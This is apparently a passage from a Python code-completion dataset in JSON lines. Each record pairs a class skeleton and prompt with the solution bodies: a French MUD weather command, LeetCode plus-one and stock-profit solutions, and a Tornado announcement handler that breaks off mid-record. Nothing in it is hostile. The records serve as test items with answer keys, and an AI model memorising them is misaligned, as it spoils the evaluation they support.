Si vous ne savez pas quelles perturbations sont disponibles, entrez la commande sans paramètre.\"", "if dic_masques['cle']:\n cle = dic_masques['cle'].cle\n classe = None\n for t_classe in importeur.meteo.perturbations:\n if t_classe.nom_pertu == cle and t_classe.origine:\n classe = t_classe\n break\n if classe is None:\n personnage << \"|err|Cette perturbation n'existe pas.|ff|\"\n return\n if not personnage.salle.coords.valide:\n personnage << '|err|Vous vous trouvez dans une salle sans coordonnées.|ff|'\n return\n n_pertu = classe(personnage.salle.coords.get_copie())\n for pertu in importeur.meteo.perturbations_actuelles:\n if n_pertu.va_recouvrir(pertu):\n personnage << '|err|Une autre perturbation est trop proche de vous.|ff|'\n n_pertu.detruire()\n return\n personnage << 'Vous avez bien créé une nouvelle perturbation {}.'.format(n_pertu.nom_pertu)\n importeur.meteo.perturbations_actuelles.append(n_pertu)\n n_pertu.envoyer_message_debut()\nelse:\n tableau = Tableau('Perturbations existantes')\n tableau.ajouter_colonne('Clé')\n tableau.ajouter_colonne('Attributs')\n for perturbation in sorted(importeur.meteo.perturbations, key=lambda p: p.nom_pertu):\n attributs = ', '.join(perturbation.attributs)\n tableau.ajouter_ligne(perturbation.nom_pertu, attributs)\n personnage << tableau.afficher()"], "bodies_text": "<|body_start_0|>\n Parametre.__init__(self, 'creer', 'create')\n self.schema = '()'\n self.aide_courte = 'crée une perturbation'\n self.aide_longue = \"Cette commande permet de créer une perturbation météorologique dans la salle où vous vous trouvez (par exemple, faire apparaître un nuage). La salle où vous vous trouvez est prise comme point de départ. Notez que vous ne pourrez pas faire apparaître une perturbation si une autre est présente ou trop proche. Les perturbations ont en effet des rayons d'action, et deux perturbations ne doivent pas entrer en conflit (un nuage ne doit pas en recouvrir un second, par exemple). 
Si vous ne savez pas quelles perturbations sont disponibles, entrez la commande sans paramètre.\"\n<|end_body_0|>\n\n<|body_start_1|>\n if dic_masques['cle']:\n cle = dic_masques['cle'].cle\n classe = None\n for t_classe in importeur.meteo.perturbations:\n if t_classe.nom_pertu == cle and t_classe.origine:\n classe = t_classe\n break\n if classe is None:\n personnage << \"|err|Cette perturbation n'existe pas.|ff|\"\n return\n if not personnage.salle.coords.valide:\n personnage << '|err|Vous vous trouvez dans une salle sans coordonnées.|ff|'\n return\n n_pertu = classe(personnage.salle.coords.get_copie())\n for pertu in importeur.meteo.perturbations_actuelles:\n if n_pertu.va_recouvrir(pertu):\n personnage << '|err|Une autre perturbation est trop proche de vous.|ff|'\n n_pertu.detruire()\n return\n personnage << 'Vous avez bien créé une nouvelle perturbation {}.'.format(n_pertu.nom_pertu)\n importeur.meteo.perturbations_actuelles.append(n_pertu)\n n_pertu.envoyer_message_debut()\n else:\n tableau = Tableau('Perturbations existantes')\n tableau.ajouter_colonne('Clé')\n tableau.ajouter_colonne('Attributs')\n for perturbation in sorted(importeur.meteo.perturbations, key=lambda p: p.nom_pertu):\n attributs = ', '.join(perturbation.attributs)\n tableau.ajouter_ligne(perturbation.nom_pertu, attributs)\n personnage << tableau.afficher()\n<|end_body_1|>\n", "class_docstring": "Commande 'meteo créer'", "class_name": "PrmCreer", "detected_licenses": ["BSD-3-Clause"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass PrmCreer:\n \"\"\"Commande 'meteo créer'\"\"\"\n\n def __init__(self):\n \"\"\"Constructeur du paramètre.\"\"\"\n <|body_0|>\n\n def interpreter(self, personnage, dic_masques):\n \"\"\"Méthode d'interprétation de commande\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n Parametre.__init__(self, 'creer', 'create')\n self.schema = '()'\n self.aide_courte = 'crée une perturbation'\n self.aide_longue = \"Cette commande permet de créer une perturbation météorologique dans la salle où vous vous trouvez (par exemple, faire apparaître un nuage). La salle où vous vous trouvez est prise comme point de départ. Notez que vous ne pourrez pas faire apparaître une perturbation si une autre est présente ou trop proche. Les perturbations ont en effet des rayons d'action, et deux perturbations ne doivent pas entrer en conflit (un nuage ne doit pas en recouvrir un second, par exemple). 
Si vous ne savez pas quelles perturbations sont disponibles, entrez la commande sans paramètre.\"\n<|end_body_0|>\n\n<|body_start_1|>\n if dic_masques['cle']:\n cle = dic_masques['cle'].cle\n classe = None\n for t_classe in importeur.meteo.perturbations:\n if t_classe.nom_pertu == cle and t_classe.origine:\n classe = t_classe\n break\n if classe is None:\n personnage << \"|err|Cette perturbation n'existe pas.|ff|\"\n return\n if not personnage.salle.coords.valide:\n personnage << '|err|Vous vous trouvez dans une salle sans coordonnées.|ff|'\n return\n n_pertu = classe(personnage.salle.coords.get_copie())\n for pertu in importeur.meteo.perturbations_actuelles:\n if n_pertu.va_recouvrir(pertu):\n personnage << '|err|Une autre perturbation est trop proche de vous.|ff|'\n n_pertu.detruire()\n return\n personnage << 'Vous avez bien créé une nouvelle perturbation {}.'.format(n_pertu.nom_pertu)\n importeur.meteo.perturbations_actuelles.append(n_pertu)\n n_pertu.envoyer_message_debut()\n else:\n tableau = Tableau('Perturbations existantes')\n tableau.ajouter_colonne('Clé')\n tableau.ajouter_colonne('Attributs')\n for perturbation in sorted(importeur.meteo.perturbations, key=lambda p: p.nom_pertu):\n attributs = ', '.join(perturbation.attributs)\n tableau.ajouter_ligne(perturbation.nom_pertu, attributs)\n personnage << tableau.afficher()\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000265", "length_bytes": 4658, "license_type": "permissive", "methods": [{"docstring": "Constructeur du paramètre.", "name": "__init__", "signature": "def __init__(self)"}, {"docstring": "Méthode d'interprétation de commande", "name": "interpreter", "signature": "def interpreter(self, personnage, dic_masques)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_004934", "prompt": "Implement the Python class `PrmCreer` described below.\n\nClass description:\nCommande 'meteo créer'\n\nMethod signatures and docstrings:\n- def __init__(self): Constructeur du paramètre.\n- def interpreter(self, personnage, dic_masques): Méthode d'interprétation de commande", "prompted_full_text": "Implement the Python class `PrmCreer` described below.\n\nClass description:\nCommande 'meteo créer'\n\nMethod signatures and docstrings:\n- def __init__(self): Constructeur du paramètre.\n- def interpreter(self, personnage, dic_masques): Méthode d'interprétation de commande\n\n<|skeleton|>\nclass PrmCreer:\n \"\"\"Commande 'meteo créer'\"\"\"\n\n def __init__(self):\n \"\"\"Constructeur du paramètre.\"\"\"\n <|body_0|>\n\n def interpreter(self, personnage, dic_masques):\n \"\"\"Méthode d'interprétation de commande\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n Parametre.__init__(self, 'creer', 'create')\n self.schema = '()'\n self.aide_courte = 'crée une perturbation'\n self.aide_longue = \"Cette commande permet de créer une perturbation météorologique dans la salle où vous vous trouvez (par exemple, faire apparaître un nuage). La salle où vous vous trouvez est prise comme point de départ. Notez que vous ne pourrez pas faire apparaître une perturbation si une autre est présente ou trop proche. Les perturbations ont en effet des rayons d'action, et deux perturbations ne doivent pas entrer en conflit (un nuage ne doit pas en recouvrir un second, par exemple). 
Si vous ne savez pas quelles perturbations sont disponibles, entrez la commande sans paramètre.\"\n<|end_body_0|>\n\n<|body_start_1|>\n if dic_masques['cle']:\n cle = dic_masques['cle'].cle\n classe = None\n for t_classe in importeur.meteo.perturbations:\n if t_classe.nom_pertu == cle and t_classe.origine:\n classe = t_classe\n break\n if classe is None:\n personnage << \"|err|Cette perturbation n'existe pas.|ff|\"\n return\n if not personnage.salle.coords.valide:\n personnage << '|err|Vous vous trouvez dans une salle sans coordonnées.|ff|'\n return\n n_pertu = classe(personnage.salle.coords.get_copie())\n for pertu in importeur.meteo.perturbations_actuelles:\n if n_pertu.va_recouvrir(pertu):\n personnage << '|err|Une autre perturbation est trop proche de vous.|ff|'\n n_pertu.detruire()\n return\n personnage << 'Vous avez bien créé une nouvelle perturbation {}.'.format(n_pertu.nom_pertu)\n importeur.meteo.perturbations_actuelles.append(n_pertu)\n n_pertu.envoyer_message_debut()\n else:\n tableau = Tableau('Perturbations existantes')\n tableau.ajouter_colonne('Clé')\n tableau.ajouter_colonne('Attributs')\n for perturbation in sorted(importeur.meteo.perturbations, key=lambda p: p.nom_pertu):\n attributs = ', '.join(perturbation.attributs)\n tableau.ajouter_ligne(perturbation.nom_pertu, attributs)\n personnage << tableau.afficher()\n<|end_body_1|>\n", "revision_id": "7e93bff08cdf891352efba587e89c40f3b4a2301", "skeleton": "<|skeleton|>\nclass PrmCreer:\n \"\"\"Commande 'meteo créer'\"\"\"\n\n def __init__(self):\n \"\"\"Constructeur du paramètre.\"\"\"\n <|body_0|>\n\n def interpreter(self, personnage, dic_masques):\n \"\"\"Méthode d'interprétation de commande\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class PrmCreer:\n \"\"\"Commande 'meteo créer'\"\"\"\n\n def __init__(self):\n \"\"\"Constructeur du paramètre.\"\"\"\n Parametre.__init__(self, 'creer', 'create')\n self.schema = '()'\n self.aide_courte = 'crée une perturbation'\n self.aide_longue = \"Cette commande permet de créer une perturbation météorologique dans la salle où vous vous trouvez (par exemple, faire apparaître un nuage). La salle où vous vous trouvez est prise comme point de départ. Notez que vous ne pourrez pas faire apparaître une perturbation si une autre est présente ou trop proche. Les perturbations ont en effet des rayons d'action, et deux perturbations ne doivent pas entrer en conflit (un nuage ne doit pas en recouvrir un second, par exemple). 
Si vous ne savez pas quelles perturbations sont disponibles, entrez la commande sans paramètre.\"\n\n    def interpreter(self, personnage, dic_masques):\n        \"\"\"Méthode d'interprétation de commande\"\"\"\n        if dic_masques['cle']:\n            cle = dic_masques['cle'].cle\n            classe = None\n            for t_classe in importeur.meteo.perturbations:\n                if t_classe.nom_pertu == cle and t_classe.origine:\n                    classe = t_classe\n                    break\n            if classe is None:\n                personnage << \"|err|Cette perturbation n'existe pas.|ff|\"\n                return\n            if not personnage.salle.coords.valide:\n                personnage << '|err|Vous vous trouvez dans une salle sans coordonnées.|ff|'\n                return\n            n_pertu = classe(personnage.salle.coords.get_copie())\n            for pertu in importeur.meteo.perturbations_actuelles:\n                if n_pertu.va_recouvrir(pertu):\n                    personnage << '|err|Une autre perturbation est trop proche de vous.|ff|'\n                    n_pertu.detruire()\n                    return\n            personnage << 'Vous avez bien créé une nouvelle perturbation {}.'.format(n_pertu.nom_pertu)\n            importeur.meteo.perturbations_actuelles.append(n_pertu)\n            n_pertu.envoyer_message_debut()\n        else:\n            tableau = Tableau('Perturbations existantes')\n            tableau.ajouter_colonne('Clé')\n            tableau.ajouter_colonne('Attributs')\n            for perturbation in sorted(importeur.meteo.perturbations, key=lambda p: p.nom_pertu):\n                attributs = ', '.join(perturbation.attributs)\n                tableau.ajouter_ligne(perturbation.nom_pertu, attributs)\n            personnage << tableau.afficher()\n", "source": "the_stack_v2_python_sparse", "source_path": "src/primaires/meteo/commandes/meteo/creer.py", "source_repo": "vincent-lg/tsunami", "split": "test", "star_events_count": 5} {"blob_id": "237301f707617ec931ab8dc4acd3b066752d3196", "bodies": ["l = len(digits)\np = l - 1\nf = False\nwhile p >= 0:\n    if digits[p] != 9:\n        digits[p] += 1\n        if f == True or p == l - 1:\n            return digits\n    else:\n        f = True\n        digits[p] = 0\n    p -= 1\n    if p == -1:\n        digits.insert(0, 1)\n        return digits", "length = len(digits)\ndigits = digits[::-1]\nfor i in range(length):\n    if digits[i] + 1 < 10:\n        digits[i] = digits[i] + 1\n        break\n    elif i != length - 1:\n        digits[i] = 0\n    else:\n        digits[i] = 0\n        digits.append(1)\ndigits = digits[::-1]\nreturn digits", "s = ''\nfor i in digits:\n    s += str(i)\ns = int(s)\ns += 1\ns = str(s)\ndigits = []\nfor i in s:\n    digits.append(int(i))\nreturn digits"], "bodies_text": "<|body_start_0|>\n        l = len(digits)\n        p = l - 1\n        f = False\n        while p >= 0:\n            if digits[p] != 9:\n                digits[p] += 1\n                if f == True or p == l - 1:\n                    return digits\n            else:\n                f = True\n                digits[p] = 0\n            p -= 1\n            if p == -1:\n                digits.insert(0, 1)\n                return digits\n<|end_body_0|>\n\n<|body_start_1|>\n        length = len(digits)\n        digits = digits[::-1]\n        for i in range(length):\n            if digits[i] + 1 < 10:\n                digits[i] = digits[i] + 1\n                break\n            elif i != length - 1:\n                digits[i] = 0\n            else:\n                digits[i] = 0\n                digits.append(1)\n        digits = digits[::-1]\n        return digits\n<|end_body_1|>\n\n<|body_start_2|>\n        s = ''\n        for i in digits:\n            s += str(i)\n        s = int(s)\n        s += 1\n        s = str(s)\n        digits = []\n        for i in s:\n            digits.append(int(i))\n        return digits\n<|end_body_2|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n    def plusOne(self, digits):\n        \"\"\":type digits: List[int] :rtype: List[int] Compute over the digits in their original order\"\"\"\n        <|body_0|>\n\n    def plusOne2(self, digits):\n        \"\"\":type digits: List[int] :rtype: List[int] Reverse the array and work from left to right. If the first digit plus 1 is less than 10, just add 1 and exit the loop. If it reaches 10, set the current digit to 0 and continue; at the last digit, set it to 0 and append an extra 1\"\"\"\n        <|body_1|>\n\n    def plusOne3(self, digits):\n        \"\"\":type digits: List[int] :rtype: List[int] Type-conversion approach\"\"\"\n        <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n        l = len(digits)\n        p = l - 1\n        f = False\n        while p >= 0:\n            if digits[p] != 9:\n                digits[p] += 1\n                if f == True or p == l - 1:\n                    return digits\n            else:\n                f = True\n                digits[p] = 0\n            p -= 1\n            if p == -1:\n                digits.insert(0, 1)\n                return digits\n<|end_body_0|>\n\n<|body_start_1|>\n        length = len(digits)\n        digits = digits[::-1]\n        for i in range(length):\n            if digits[i] + 1 < 10:\n                digits[i] = digits[i] + 1\n                break\n            elif i != length - 1:\n                digits[i] = 0\n            else:\n                digits[i] = 0\n                digits.append(1)\n        digits = digits[::-1]\n        return digits\n<|end_body_1|>\n\n<|body_start_2|>\n        s = ''\n        for i in digits:\n            s += str(i)\n        s = int(s)\n        s += 1\n        s = str(s)\n        digits = []\n        for i in s:\n            digits.append(int(i))\n        return digits\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000266", "length_bytes": 2450, "license_type": "no_license", "methods": [{"docstring": ":type digits: List[int] :rtype: List[int] Compute over the digits in their original order", "name": "plusOne", "signature": "def plusOne(self, digits)"}, {"docstring": ":type digits: List[int] :rtype: List[int] Reverse the array and work from left to right. If the first digit plus 1 is less than 10, just add 1 and exit the loop. If it reaches 10, set the current digit to 0 and continue; at the last digit, set it to 0 and append an extra 1", "name": "plusOne2", "signature": "def plusOne2(self, digits)"}, {"docstring": ":type digits: List[int] :rtype: List[int] Type-conversion approach", "name": "plusOne3", "signature": "def plusOne3(self, digits)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_003893", "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def plusOne(self, digits): :type digits: List[int] :rtype: List[int] Compute over the digits in their original order\n- def plusOne2(self, digits): :type digits: List[int] :rtype: List[int] Reverse the array and work from left to right. If the first digit plus 1 is less than 10, just add 1 and exit the loop. If it reaches 10, set the current digit to 0 and continue; at the last digit, set it to 0 and append an extra 1\n- def plusOne3(self, digits): :type digits: List[int] :rtype: List[int] Type-conversion approach", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def plusOne(self, digits): :type digits: List[int] :rtype: List[int] Compute over the digits in their original order\n- def plusOne2(self, digits): :type digits: List[int] :rtype: List[int] Reverse the array and work from left to right. If the first digit plus 1 is less than 10, just add 1 and exit the loop. If it reaches 10, set the current digit to 0 and continue; at the last digit, set it to 0 and append an extra 1\n- def plusOne3(self, digits): :type digits: List[int] :rtype: List[int] Type-conversion approach\n\n<|skeleton|>\nclass Solution:\n\n    def plusOne(self, digits):\n        \"\"\":type digits: List[int] :rtype: List[int] Compute over the digits in their original order\"\"\"\n        <|body_0|>\n\n    def plusOne2(self, digits):\n        \"\"\":type digits: List[int] :rtype: List[int] Reverse the array and work from left to right. If the first digit plus 1 is less than 10, just add 1 and exit the loop. If it reaches 10, set the current digit to 0 and continue; at the last digit, set it to 0 and append an extra 1\"\"\"\n        <|body_1|>\n\n    def plusOne3(self, digits):\n        \"\"\":type digits: List[int] :rtype: List[int] Type-conversion approach\"\"\"\n        <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n        l = len(digits)\n        p = l - 1\n        f = False\n        while p >= 0:\n            if digits[p] != 9:\n                digits[p] += 1\n                if f == True or p == l - 1:\n                    return digits\n            else:\n                f = True\n                digits[p] = 0\n            p -= 1\n            if p == -1:\n                digits.insert(0, 1)\n                return digits\n<|end_body_0|>\n\n<|body_start_1|>\n        length = len(digits)\n        digits = digits[::-1]\n        for i in range(length):\n            if digits[i] + 1 < 10:\n                digits[i] = digits[i] + 1\n                break\n            elif i != length - 1:\n                digits[i] = 0\n            else:\n                digits[i] = 0\n                digits.append(1)\n        digits = digits[::-1]\n        return digits\n<|end_body_1|>\n\n<|body_start_2|>\n        s = ''\n        for i in digits:\n            s += str(i)\n        s = int(s)\n        s += 1\n        s = str(s)\n        digits = []\n        for i in s:\n            digits.append(int(i))\n        return digits\n<|end_body_2|>\n", "revision_id": "b0f498ebe84e46b7e17e94759dd462891dcc8f85", "skeleton": "<|skeleton|>\nclass Solution:\n\n    def plusOne(self, digits):\n        \"\"\":type digits: List[int] :rtype: List[int] Compute over the digits in their original order\"\"\"\n        <|body_0|>\n\n    def plusOne2(self, digits):\n        \"\"\":type digits: List[int] :rtype: List[int] Reverse the array and work from left to right. If the first digit plus 1 is less than 10, just add 1 and exit the loop. If it reaches 10, set the current digit to 0 and continue; at the last digit, set it to 0 and append an extra 1\"\"\"\n        <|body_1|>\n\n    def plusOne3(self, digits):\n        \"\"\":type digits: List[int] :rtype: List[int] Type-conversion approach\"\"\"\n        <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n    def plusOne(self, digits):\n        \"\"\":type digits: List[int] :rtype: List[int] Compute over the digits in their original order\"\"\"\n        l = len(digits)\n        p = l - 1\n        f = False\n        while p >= 0:\n            if digits[p] != 9:\n                digits[p] += 1\n                if f == True or p == l - 1:\n                    return digits\n            else:\n                f = True\n                digits[p] = 0\n            p -= 1\n            if p == -1:\n                digits.insert(0, 1)\n                return digits\n\n    def plusOne2(self, digits):\n        \"\"\":type digits: List[int] :rtype: List[int] Reverse the array and work from left to right. If the first digit plus 1 is less than 10, just add 1 and exit the loop. If it reaches 10, set the current digit to 0 and continue; at the last digit, set it to 0 and append an extra 1\"\"\"\n        length = len(digits)\n        digits = digits[::-1]\n        for i in range(length):\n            if digits[i] + 1 < 10:\n                digits[i] = digits[i] + 1\n                break\n            elif i != length - 1:\n                digits[i] = 0\n            else:\n                digits[i] = 0\n                digits.append(1)\n        digits = digits[::-1]\n        return digits\n\n    def plusOne3(self, digits):\n        \"\"\":type digits: List[int] :rtype: List[int] Type-conversion approach\"\"\"\n        s = ''\n        for i in digits:\n            s += str(i)\n        s = int(s)\n        s += 1\n        s = str(s)\n        digits = []\n        for i in s:\n            digits.append(int(i))\n        return digits\n", "source": "the_stack_v2_python_sparse", "source_path": "初级算法/array_7.py", "source_repo": "wulinlw/leetcode_cn", "split": "test", "star_events_count": 0}
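A quick sanity check of the three plus-one variants in the record above. This is a minimal sketch that assumes the record's Solution class is defined in scope; the sample inputs are illustrative and do not come from the record itself. Note the original plusOne body reversed the list and then started from the most-significant digit, which broke non-carry inputs like [1, 2, 3]; the corrected body above walks the digits in their original order, as its docstring says.

s = Solution()
print(s.plusOne([1, 2, 3]))   # -> [1, 2, 4] (no carry needed)
print(s.plusOne2([9, 9]))     # -> [1, 0, 0] (carry grows the list)
print(s.plusOne3([9, 9]))     # -> [1, 0, 0] (string/int round trip)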
{"blob_id": "93d76a916b7824060a84f863b33a73ac503767fe", "bodies": ["if not prices:\n    return 0\npre = 0\nopt_profit = 0\nfor i in range(1, len(prices)):\n    pre = max(pre + (prices[i] - prices[i - 1]), 0)\n    opt_profit = max(opt_profit, pre)\nreturn opt_profit", "if not prices:\n    return 0\nmin_price = float('inf')\nopt = 0\nfor price in prices:\n    min_price = min(price, min_price)\n    opt = max(opt, price - min_price)\nreturn opt"], "bodies_text": "<|body_start_0|>\n        if not prices:\n            return 0\n        pre = 0\n        opt_profit = 0\n        for i in range(1, len(prices)):\n            pre = max(pre + (prices[i] - prices[i - 1]), 0)\n            opt_profit = max(opt_profit, pre)\n        return opt_profit\n<|end_body_0|>\n\n<|body_start_1|>\n        if not prices:\n            return 0\n        min_price = float('inf')\n        opt = 0\n        for price in prices:\n            min_price = min(price, min_price)\n            opt = max(opt, price - min_price)\n        return opt\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n    def max_profit(self, prices):\n        \"\"\"The meaning of dp[i] is the maximum profit of selling the stock at i-th day. And the stock has to be bought on or before that day. dp[i+1] is max(dp[i] + (prices[i+1] - prices[i]), 0). This is because the sell day is fixed and bought day must be the same as bought day of dp[i]. However, if this value is less than zero, we would rather buy and sell on the (i+1)-th day, to make the profit equal to 0.\"\"\"\n        <|body_0|>\n\n    def max_profit_min_price(self, prices):\n        \"\"\"The idea is to maintain the min_price and max_profit, the update rule for max_profit is max(max_profit, current_price - min_price)\"\"\"\n        <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n        if not prices:\n            return 0\n        pre = 0\n        opt_profit = 0\n        for i in range(1, len(prices)):\n            pre = max(pre + (prices[i] - prices[i - 1]), 0)\n            opt_profit = max(opt_profit, pre)\n        return opt_profit\n<|end_body_0|>\n\n<|body_start_1|>\n        if not prices:\n            return 0\n        min_price = float('inf')\n        opt = 0\n        for price in prices:\n            min_price = min(price, min_price)\n            opt = max(opt, price - min_price)\n        return opt\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000267", "length_bytes": 1473, "license_type": "no_license", "methods": [{"docstring": "The meaning of dp[i] is the maximum profit of selling the stock at i-th day. And the stock has to be bought on or before that day. dp[i+1] is max(dp[i] + (prices[i+1] - prices[i]), 0). This is because the sell day is fixed and bought day must be the same as bought day of dp[i]. However, if this value is less than zero, we would rather buy and sell on the (i+1)-th day, to make the profit equal to 0.", "name": "max_profit", "signature": "def max_profit(self, prices)"}, {"docstring": "The idea is to maintain the min_price and max_profit, the update rule for max_profit is max(max_profit, current_price - min_price)", "name": "max_profit_min_price", "signature": "def max_profit_min_price(self, prices)"}], "n_methods": 2, "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def max_profit(self, prices): The meaning of dp[i] is the maximum profit of selling the stock at i-th day. And the stock has to be bought on or before that day. dp[i+1] is max(dp[i] + (prices[i+1] - prices[i]), 0). This is because the sell day is fixed and bought day must be the same as bought day of dp[i]. However, if this value is less than zero, we would rather buy and sell on the (i+1)-th day, to make the profit equal to 0.\n- def max_profit_min_price(self, prices): The idea is to maintain the min_price and max_profit, the update rule for max_profit is max(max_profit, current_price - min_price)", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def max_profit(self, prices): The meaning of dp[i] is the maximum profit of selling the stock at i-th day. And the stock has to be bought on or before that day. dp[i+1] is max(dp[i] + (prices[i+1] - prices[i]), 0). This is because the sell day is fixed and bought day must be the same as bought day of dp[i]. However, if this value is less than zero, we would rather buy and sell on the (i+1)-th day, to make the profit equal to 0.\n- def max_profit_min_price(self, prices): The idea is to maintain the min_price and max_profit, the update rule for max_profit is max(max_profit, current_price - min_price)\n\n<|skeleton|>\nclass Solution:\n\n    def max_profit(self, prices):\n        \"\"\"The meaning of dp[i] is the maximum profit of selling the stock at i-th day. And the stock has to be bought on or before that day. dp[i+1] is max(dp[i] + (prices[i+1] - prices[i]), 0). This is because the sell day is fixed and bought day must be the same as bought day of dp[i]. However, if this value is less than zero, we would rather buy and sell on the (i+1)-th day, to make the profit equal to 0.\"\"\"\n        <|body_0|>\n\n    def max_profit_min_price(self, prices):\n        \"\"\"The idea is to maintain the min_price and max_profit, the update rule for max_profit is max(max_profit, current_price - min_price)\"\"\"\n        <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n        if not prices:\n            return 0\n        pre = 0\n        opt_profit = 0\n        for i in range(1, len(prices)):\n            pre = max(pre + (prices[i] - prices[i - 1]), 0)\n            opt_profit = max(opt_profit, pre)\n        return opt_profit\n<|end_body_0|>\n\n<|body_start_1|>\n        if not prices:\n            return 0\n        min_price = float('inf')\n        opt = 0\n        for price in prices:\n            min_price = min(price, min_price)\n            opt = max(opt, price - min_price)\n        return opt\n<|end_body_1|>\n", "revision_id": "5625e6396b746255f3343253c75447ead95879c7", "skeleton": "<|skeleton|>\nclass Solution:\n\n    def max_profit(self, prices):\n        \"\"\"The meaning of dp[i] is the maximum profit of selling the stock at i-th day. And the stock has to be bought on or before that day. dp[i+1] is max(dp[i] + (prices[i+1] - prices[i]), 0). This is because the sell day is fixed and bought day must be the same as bought day of dp[i]. However, if this value is less than zero, we would rather buy and sell on the (i+1)-th day, to make the profit equal to 0.\"\"\"\n        <|body_0|>\n\n    def max_profit_min_price(self, prices):\n        \"\"\"The idea is to maintain the min_price and max_profit, the update rule for max_profit is max(max_profit, current_price - min_price)\"\"\"\n        <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n    def max_profit(self, prices):\n        \"\"\"The meaning of dp[i] is the maximum profit of selling the stock at i-th day. And the stock has to be bought on or before that day. dp[i+1] is max(dp[i] + (prices[i+1] - prices[i]), 0). This is because the sell day is fixed and bought day must be the same as bought day of dp[i]. However, if this value is less than zero, we would rather buy and sell on the (i+1)-th day, to make the profit equal to 0.\"\"\"\n        if not prices:\n            return 0\n        pre = 0\n        opt_profit = 0\n        for i in range(1, len(prices)):\n            pre = max(pre + (prices[i] - prices[i - 1]), 0)\n            opt_profit = max(opt_profit, pre)\n        return opt_profit\n\n    def max_profit_min_price(self, prices):\n        \"\"\"The idea is to maintain the min_price and max_profit, the update rule for max_profit is max(max_profit, current_price - min_price)\"\"\"\n        if not prices:\n            return 0\n        min_price = float('inf')\n        opt = 0\n        for price in prices:\n            min_price = min(price, min_price)\n            opt = max(opt, price - min_price)\n        return opt\n", "source": "the_stack_v2_python_sparse", "source_path": "121_best_time_to_buy_and_sell_stock/solution.py", "source_repo": "FluffyFu/Leetcode", "split": "test", "star_events_count": 0}
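To make the dp recurrence in the record above concrete, here is a short hand trace on a small price list (the prices are illustrative and not taken from the record):

prices = [7, 1, 5, 3, 6, 4]
pre, opt = 0, 0
for i in range(1, len(prices)):
    pre = max(pre + (prices[i] - prices[i - 1]), 0)  # best profit if we must sell on day i
    opt = max(opt, pre)
# pre evolves 0, 4, 2, 5, 3 and opt ends at 5 (buy at 1, sell at 6),
# which matches max_profit_min_price on the same input.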
{"blob_id": "b1e4ed4478ff182dfe54a677c76f41ebe36c829e", "bodies": ["status = ErrorCode.SUCCESS\ntry:\n    data = DotDict(json_decode(self.request.body))\n    content = data.get('content', '')\n    mobiles = data.get('mobiles', None)\n    logging.info('[UWEB] Announcement request: %s', data)\nexcept Exception as e:\n    status = ErrorCode.ILLEGAL_DATA_FORMAT\n    self.write_ret(status)\n    return\ntry:\n    mobiles_ = u''\n    if mobiles is not None:\n        mobiles_ = ','.join(mobiles)\n        for mobile in mobiles:\n            SMSHelper.send(mobile, content)\n    announcement = dict(cid=self.current_user.cid, content=content, mobiles=mobiles_)\n    record_announcement(self.db, announcement)\n    self.write_ret(status)\nexcept Exception as e:\n    status = ErrorCode.SERVER_BUSY\n    logging.exception('[UWEB] record share failed, Exception: %s', e.args)\n    self.write_ret(status)", "status = ErrorCode.SUCCESS\ntry:\n    delete_ids = map(int, str_to_list(self.get_argument('ids', None)))\n    logging.info('[UWEB] Delete announcement: %s', delete_ids)\nexcept Exception as e:\n    status = ErrorCode.ILLEGAL_DATA_FORMAT\n    logging.exception('[UWEB] data format illegal. Exception: %s', e.args)\n    self.write_ret(status)\n    return\ntry:\n    self.db.execute('DELETE FROM T_ANNOUNCEMENT_LOG WHERE id IN %s', tuple(delete_ids + DUMMY_IDS))\n    self.write_ret(status)\nexcept Exception as e:\n    status = ErrorCode.SERVER_BUSY\n    logging.exception('[UWEB] Delete announcement failed. Exception: %s', e.args)\n    self.write_ret(status)"], "bodies_text": "<|body_start_0|>\n        status = ErrorCode.SUCCESS\n        try:\n            data = DotDict(json_decode(self.request.body))\n            content = data.get('content', '')\n            mobiles = data.get('mobiles', None)\n            logging.info('[UWEB] Announcement request: %s', data)\n        except Exception as e:\n            status = ErrorCode.ILLEGAL_DATA_FORMAT\n            self.write_ret(status)\n            return\n        try:\n            mobiles_ = u''\n            if mobiles is not None:\n                mobiles_ = ','.join(mobiles)\n                for mobile in mobiles:\n                    SMSHelper.send(mobile, content)\n            announcement = dict(cid=self.current_user.cid, content=content, mobiles=mobiles_)\n            record_announcement(self.db, announcement)\n            self.write_ret(status)\n        except Exception as e:\n            status = ErrorCode.SERVER_BUSY\n            logging.exception('[UWEB] record share failed, Exception: %s', e.args)\n            